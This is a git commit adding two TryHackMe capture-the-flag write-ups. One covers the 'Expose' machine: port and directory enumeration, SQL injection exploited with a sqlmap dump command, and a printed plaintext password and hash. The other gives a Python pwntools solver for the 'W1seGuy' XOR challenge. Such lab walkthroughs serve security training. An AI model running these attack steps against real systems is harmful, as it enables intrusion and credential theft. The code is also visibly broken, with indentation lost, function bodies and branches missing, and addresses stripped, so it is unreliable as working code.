Added W1seGuy solution

This commit is contained in:
gurkenhabicht 2024-06-23 20:03:59 +02:00
parent b5eae1cb94
commit ac341cd1e5
2 changed files with 465 additions and 0 deletions

tryhackme/ Normal file
View File

@ -0,0 +1,343 @@
# Expose Writeup
This is an easy machine that teaches you enumeration and patience.
## Enumeration
nmap -p- --min-rate 3000
Starting Nmap 7.94 ( ) at 2023-09-03 14:25 CEST
Nmap scan report for
Host is up (0.064s latency).
Not shown: 65530 closed tcp ports (conn-refused)
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
1337/tcp open waste
1883/tcp open mqtt
Nmap done: 1 IP address (1 host up) scanned in 23.94 seconds
### FTP
Taking a quick look at the ftp content yields and empty directory and no interesting information
$ ftp anonymous@
Connected to
220 Welcome to the Expose Web Challenge.
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||30302|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 121 4096 Jun 11 11:56 .
drwxr-xr-x 2 0 121 4096 Jun 11 11:56 ..
226 Directory send OK.
### MQTT
Taking a look at the messages sent via mqtt topics through [MQTT-Explorer]( shows a bunch of metrics data.
I'll ignore this for now.
### Web
Next in line is web enumeration. Therefore, I'll use dirsearch.
$ dirsearch -r -R 5 -u
[00:43:20] Starting:
[00:43:23] 403 - 279B - /.ht_wsr.txt
[00:43:23] 403 - 279B - /.htaccess.bak1
[00:43:23] 403 - 279B - /.htaccess.sample
[00:43:23] 403 - 279B - /.htaccess.orig
[00:43:23] 403 - 279B - /.htaccess_orig
[00:43:23] 403 - 279B - /
[00:43:23] 403 - 279B - /.htaccess_extra
[00:43:23] 403 - 279B - /.htaccess_sc
[00:43:23] 403 - 279B - /.htaccessOLD
[00:43:23] 403 - 279B - /.htaccessOLD2
[00:43:23] 403 - 279B - /.htaccessBAK
[00:43:23] 403 - 279B - /.html
[00:43:23] 403 - 279B - /.htm
[00:43:23] 403 - 279B - /.htpasswds
[00:43:23] 403 - 279B - /.htpasswd_test
[00:43:23] 403 - 279B - /.httr-oauth
[00:43:24] 403 - 279B - /.php
[00:43:32] 301 - 319B - /admin -> (Added to queue)
[00:43:33] 403 - 279B - /admin/.htaccess
[00:43:33] 200 - 1KB - /admin/
[00:43:33] 200 - 1KB - /admin/?/login
[00:43:33] 200 - 1KB - /admin/index.php
[00:43:35] 301 - 323B - /admin_101 -> (Added to queue)
[00:43:53] 200 - 91B - /index.php
[00:43:53] 200 - 91B - /index.php/login/ (Added to queue)
[00:43:54] 301 - 324B - /javascript -> (Added to queue)
[00:44:00] 200 - 15KB - /phpmyadmin/doc/html/index.html
[00:44:01] 301 - 324B - /phpmyadmin ->
[00:44:02] 200 - 14KB - /phpmyadmin/
[00:44:02] 200 - 14KB - /phpmyadmin/index.php
[00:44:05] 403 - 279B - /server-status/ (Added to queue)
[00:44:05] 403 - 279B - /server-status
[00:44:14] Starting: admin/
[00:44:17] 403 - 279B - /admin/.ht_wsr.txt
[00:44:17] 403 - 279B - /admin/.htaccess.orig
[00:44:17] 403 - 279B - /admin/
[00:44:17] 403 - 279B - /admin/.htm
[00:44:17] 403 - 279B - /admin/.html
[00:44:17] 403 - 279B - /admin/.htpasswd_test
[00:44:17] 403 - 279B - /admin/.htaccess_sc
[00:44:17] 403 - 279B - /admin/.htpasswds
[00:44:17] 403 - 279B - /admin/.htaccessOLD
[00:44:17] 403 - 279B - /admin/.htaccessBAK
[00:44:17] 403 - 279B - /admin/.htaccess_extra
[00:44:17] 403 - 279B - /admin/.htaccess_orig
[00:44:17] 403 - 279B - /admin/.htaccess.sample
[00:44:17] 403 - 279B - /admin/.htaccessOLD2
[00:44:17] 403 - 279B - /admin/.httr-oauth
[00:44:17] 403 - 279B - /admin/.htaccess.bak1
[00:44:18] 403 - 279B - /admin/.php
[00:44:35] 301 - 326B - /admin/assets -> (Added to queue)
[00:44:35] 200 - 2KB - /admin/assets/
[00:44:45] 200 - 1KB - /admin/index.php
[00:44:45] 200 - 1KB - /admin/index.php/login/ (Added to queue)
[00:44:48] 500 - 0B - /admin/logout.php
[00:44:50] 301 - 327B - /admin/modules -> (Added to queue)
[00:44:50] 200 - 1KB - /admin/modules/
[00:45:05] Starting: admin_101/
[00:45:08] 403 - 279B - /admin_101/.ht_wsr.txt
[00:45:08] 403 - 279B - /admin_101/.htaccess.bak1
[00:45:08] 403 - 279B - /admin_101/.htaccess.orig
[00:45:08] 403 - 279B - /admin_101/.htaccess.sample
[00:45:08] 403 - 279B - /admin_101/.htaccessOLD2
[00:45:08] 403 - 279B - /admin_101/
[00:45:08] 403 - 279B - /admin_101/.htaccessBAK
[00:45:08] 403 - 279B - /admin_101/.htaccess_extra
[00:45:08] 403 - 279B - /admin_101/.htaccess_orig
[00:45:08] 403 - 279B - /admin_101/.htaccess_sc
[00:45:08] 403 - 279B - /admin_101/.html
[00:45:09] 403 - 279B - /admin_101/.htm
[00:45:09] 403 - 279B - /admin_101/.httr-oauth
[00:45:09] 403 - 279B - /admin_101/.htpasswds
[00:45:09] 403 - 279B - /admin_101/.htpasswd_test
[00:45:09] 403 - 279B - /admin_101/.htaccessOLD
[00:45:10] 403 - 279B - /admin_101/.php
[00:45:25] 200 - 2KB - /admin_101/assets/ (Added to queue)
[00:45:25] 301 - 330B - /admin_101/assets ->
[00:45:28] 302 - 1KB - /admin_101/chat.php -> index
[00:45:36] 301 - 332B - /admin_101/includes -> (Added to queue)
[00:45:36] 200 - 1KB - /admin_101/includes/
[00:45:36] 200 - 2KB - /admin_101/index.php
[00:45:36] 200 - 2KB - /admin_101/index.php/login/ (Added to queue)
[00:45:39] 302 - 0B - /admin_101/logout.php -> login
[00:45:41] 200 - 1KB - /admin_101/modules/ (Added to queue)
[00:45:41] 301 - 331B - /admin_101/modules ->
[00:45:49] 200 - 2KB - /admin_101/signup.php
[00:45:52] 301 - 328B - /admin_101/test -> (Added to queue)
[00:45:52] 200 - 769B - /admin_101/test/
[00:46:04] Starting: index.php/login/
[00:46:56] Starting: javascript/
[00:46:59] 403 - 279B - /javascript/.htaccess.bak1
[00:46:59] 403 - 279B - /javascript/.ht_wsr.txt
[00:46:59] 403 - 279B - /javascript/.htaccess.orig
[00:46:59] 403 - 279B - /javascript/.htaccessOLD2
[00:46:59] 403 - 279B - /javascript/.htaccessBAK
[00:46:59] 403 - 279B - /javascript/.htaccess_sc
[00:46:59] 403 - 279B - /javascript/.htaccess_extra
[00:46:59] 403 - 279B - /javascript/
[00:46:59] 403 - 279B - /javascript/.htaccess.sample
[00:46:59] 403 - 279B - /javascript/.htaccessOLD
[00:46:59] 403 - 279B - /javascript/.htaccess_orig
[00:46:59] 403 - 279B - /javascript/.htpasswd_test
[00:47:00] 403 - 279B - /javascript/.htpasswds
[00:47:00] 403 - 279B - /javascript/.htm
[00:47:00] 403 - 279B - /javascript/.httr-oauth
[00:47:00] 403 - 279B - /javascript/.html
[00:47:01] 403 - 279B - /javascript/.php
[00:47:48] Starting: server-status/
[00:47:50] 404 - 276B - /server-status/%2e%2e//
[00:48:41] Starting: admin/assets/
[00:48:44] 403 - 279B - /admin/assets/.ht_wsr.txt
[00:48:44] 403 - 279B - /admin/assets/.htaccess.bak1
[00:48:44] 403 - 279B - /admin/assets/.htaccess.orig
[00:48:44] 403 - 279B - /admin/assets/
[00:48:44] 403 - 279B - /admin/assets/.htaccess.sample
[00:48:44] 403 - 279B - /admin/assets/.htpasswds
[00:48:44] 403 - 279B - /admin/assets/.httr-oauth
[00:48:44] 403 - 279B - /admin/assets/.htaccessOLD
[00:48:44] 403 - 279B - /admin/assets/.htaccess_extra
[00:48:44] 403 - 279B - /admin/assets/.htaccess_orig
[00:48:44] 403 - 279B - /admin/assets/.htaccessOLD2
[00:48:44] 403 - 279B - /admin/assets/.htaccessBAK
[00:48:44] 403 - 279B - /admin/assets/.htaccess_sc
[00:48:44] 403 - 279B - /admin/assets/.html
[00:48:44] 403 - 279B - /admin/assets/.htm
[00:48:44] 403 - 279B - /admin/assets/.htpasswd_test
[00:48:46] 403 - 279B - /admin/assets/.php
[00:49:36] Starting: admin/index.php/login/
[00:50:34] Starting: admin/modules/
[00:50:38] 403 - 279B - /admin/modules/.htaccess.bak1
[00:50:38] 403 - 279B - /admin/modules/.ht_wsr.txt
[00:50:38] 403 - 279B - /admin/modules/.htaccess.sample
[00:50:38] 403 - 279B - /admin/modules/.htaccess_extra
[00:50:38] 403 - 279B - /admin/modules/.htaccess.orig
[00:50:38] 403 - 279B - /admin/modules/.htaccess_sc
[00:50:38] 403 - 279B - /admin/modules/.htaccessBAK
[00:50:38] 403 - 279B - /admin/modules/
[00:50:38] 403 - 279B - /admin/modules/.htaccessOLD2
[00:50:38] 403 - 279B - /admin/modules/.htaccess_orig
[00:50:38] 403 - 279B - /admin/modules/.htm
[00:50:38] 403 - 279B - /admin/modules/.htaccessOLD
[00:50:38] 403 - 279B - /admin/modules/.httr-oauth
[00:50:38] 403 - 279B - /admin/modules/.htpasswd_test
[00:50:38] 403 - 279B - /admin/modules/.htpasswds
[00:50:38] 403 - 279B - /admin/modules/.html
[00:50:39] 403 - 279B - /admin/modules/.php
[00:51:04] 200 - 16B - /admin/modules/footer.php
[00:51:05] 200 - 628B - /admin/modules/header.php
[00:51:29] Starting: admin_101/assets/
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.orig
[00:51:33] 403 - 279B - /admin_101/assets/.ht_wsr.txt
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.sample
[00:51:33] 403 - 279B - /admin_101/assets/
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_orig
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD2
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessBAK
[00:51:33] 403 - 279B - /admin_101/assets/.html
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_sc
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD
[00:51:33] 403 - 279B - /admin_101/assets/.htm
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.bak1
[00:51:33] 403 - 279B - /admin_101/assets/.httr-oauth
[00:51:33] 403 - 279B - /admin_101/assets/.htpasswds
[00:51:33] 403 - 279B - /admin_101/assets/.htpasswd_test
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_extra
[00:51:34] 403 - 279B - /admin_101/assets/.php
[00:52:23] Starting: admin_101/includes/
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.orig
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.bak1
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.sample
[00:52:27] 403 - 279B - /admin_101/includes/
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessBAK
[00:52:27] 403 - 279B - /admin_101/includes/.ht_wsr.txt
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_orig
[00:52:27] 403 - 279B - /admin_101/includes/.htm
[00:52:27] 403 - 279B - /admin_101/includes/.htpasswd_test
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD2
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_sc
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_extra
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD
[00:52:27] 403 - 279B - /admin_101/includes/.htpasswds
[00:52:27] 403 - 279B - /admin_101/includes/.httr-oauth
[00:52:27] 403 - 279B - /admin_101/includes/.html
[00:52:29] 403 - 279B - /admin_101/includes/.php
[00:53:18] Starting: admin_101/index.php/login/
[00:54:19] Starting: admin_101/modules/
[00:54:23] 403 - 279B - /admin_101/modules/.ht_wsr.txt
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.bak1
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.orig
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.sample
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_extra
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_orig
[00:54:23] 403 - 279B - /admin_101/modules/
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD2
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessBAK
[00:54:23] 403 - 279B - /admin_101/modules/.html
[00:54:23] 403 - 279B - /admin_101/modules/.htpasswd_test
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_sc
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD
[00:54:23] 403 - 279B - /admin_101/modules/.htm
[00:54:23] 403 - 279B - /admin_101/modules/.htpasswds
[00:54:23] 403 - 279B - /admin_101/modules/.httr-oauth
[00:54:24] 403 - 279B - /admin_101/modules/.php
[00:54:49] 200 - 16B - /admin_101/modules/footer.php
[00:54:50] 500 - 0B - /admin_101/modules/header.php
[00:55:13] Starting: admin_101/test/
[00:55:17] 403 - 279B - /admin_101/test/.ht_wsr.txt
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.orig
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.bak1
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_extra
[00:55:17] 403 - 279B - /admin_101/test/
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.sample
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_sc
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_orig
[00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD
[00:55:17] 403 - 279B - /admin_101/test/.htaccessBAK
[00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD2
[00:55:17] 403 - 279B - /admin_101/test/.htpasswd_test
[00:55:17] 403 - 279B - /admin_101/test/.htm
[00:55:17] 403 - 279B - /admin_101/test/.html
[00:55:17] 403 - 279B - /admin_101/test/.htpasswds
[00:55:17] 403 - 279B - /admin_101/test/.httr-oauth
[00:55:18] 403 - 279B - /admin_101/test/.php
We can see two different administrational url paths. Visiting `admin_101` provides a login with a username prefilled.
Catching the response of an unsuccessful login attempt via Burpsuite shows the SQL query in JSON format.
Pretty clearly there is a possible SQL injection through the username/email parameter of the form.
"status": "error",
"messages": [
"SELECT * FROM user WHERE email = 'hacker@root.thm'"
Using sqlmap on the file containing the stored POST request of the login provides us some passwords and paths stored in some database tables.
sqlmap -r ./login.req --dump
Database: expose
Table: config
[2 entries]
| id | url | password |
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
[22:53:58] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/'
[22:53:58] [INFO] fetching columns for table 'user' in database 'expose'
[22:53:58] [INFO] retrieved: 'id'
[22:53:58] [INFO] retrieved: 'int'
[22:53:58] [INFO] retrieved: 'email'
[22:53:58] [INFO] retrieved: 'varchar(512)'
[22:53:58] [INFO] retrieved: 'password'
[22:53:59] [INFO] retrieved: 'varchar(512)'
[22:53:59] [INFO] retrieved: 'created'
[22:53:59] [INFO] retrieved: 'timestamp'
[22:53:59] [INFO] fetching entries for table 'user' in database 'expose'
[22:53:59] [INFO] retrieved: '2023-02-21 09:05:46'
[22:53:59] [INFO] retrieved: 'hacker@root.thm'
[22:53:59] [INFO] retrieved: '1'
[22:53:59] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'
Database: expose
Table: user
[1 entry]
| id | email | created | password |
| 1 | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 |
[Crackstation]( is able to solve the password hash of id 1 in no time.

tryhackme/ Normal file
View File

@ -0,0 +1,122 @@
# W1seGuy
This is a solver function for the `W1seGuy` challenge of [tryhackme](
We get the implementation of the server we can connect to through the
downloaded file.
A key is a random string of alphanumeric characters with a length of 5.
We can take a look an see that there a key xored with the flag.
To execute the xor function the key has to be at the length of the flag. This
is achieved through the modulo over the length of the key. After the key has
been xored the resulting bytestring is changed to a hex representation.
We need to find out the key to xor it with the result we are given by the
server after we have been connected.
import random
import socketserver
import socket, os
import string
flag = open('flag.txt','r').read().strip()
def send_message(server, message):
enc = message.encode()
def setup(server, key):
flag = 'THM{thisisafakeflag}'
xored = ""
for i in range(0,len(flag)):
xored += chr(ord(flag[i]) ^ ord(key[i%len(key)]))
hex_encoded = xored.encode().hex()
return hex_encoded
def start(server):
res = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
key = str(res)
hex_encoded = setup(server, key)
send_message(server, "This XOR encoded text has flag 1: " + hex_encoded + "\n")
send_message(server,"What is the encryption key? ")
key_answer = server.recv(4096).decode().strip()
if key_answer == key:
send_message(server, "Congrats! That is the correct key! Here is flag 2: " + flag + "\n")
send_message(server, 'Close but no cigar' + "\n")
send_message(server, "Something went wrong. Please try again. :)\n")
class RequestHandler(socketserver.BaseRequestHandler):
def handle(self):
if __name__ == '__main__':
socketserver.ThreadingTCPServer.allow_reuse_address = True
server = socketserver.ThreadingTCPServer(('', 1337), RequestHandler)
## Solution
We need 5 characters to rebuild the key and solve the flag.
We know the flag starts with the chars `THM{` and ends with `}`, in total 5
That is enough information. We connect to the server, get the hexed and xored
flag. It is reversed to its bytestring representation and xored with a random
key. When the string `THM{` is found we've got 4 out of 5 characters of the
key. The fifth is found through iterating the alphanumeric string and xoring
the key with the flag again.
import sys
from pwn import *
import binascii
import string
import random
def solve():
p = remote(sys.argv[1], 1337)
r = p.recv().strip().split()
alpha = string.ascii_letters + string.digits
hex_encoded = r[7].decode()
print(f"Got flag 1: {hex_encoded}")
hex_decoded = binascii.unhexlify(hex_encoded).decode()
print(f"Unhexed Key is: {hex_decoded} with a length of {len(hex_decoded)}")
while True:
_res = ''
_key = str(''.join(random.choices(alpha, k=5)))
_key = _key * (len(hex_decoded) // 5 )
for i in range(0, len(hex_decoded)):
_res += chr(ord(hex_decoded[i]) ^ ord(_key[i%len(_key)]))
if _res.startswith("THM{"):
for char in alpha:
res = ''
key = _key[:4] + char
key = key * (len(hex_decoded) // 5)
for i in range(0, len(hex_decoded)):
res += chr(ord(hex_decoded[i]) ^ ord(key[i%len(key)]))
if res.endswith('}'):
print("Flag 1: " + res)
print("Key: " + key[:5])
if __name__ == "__main__":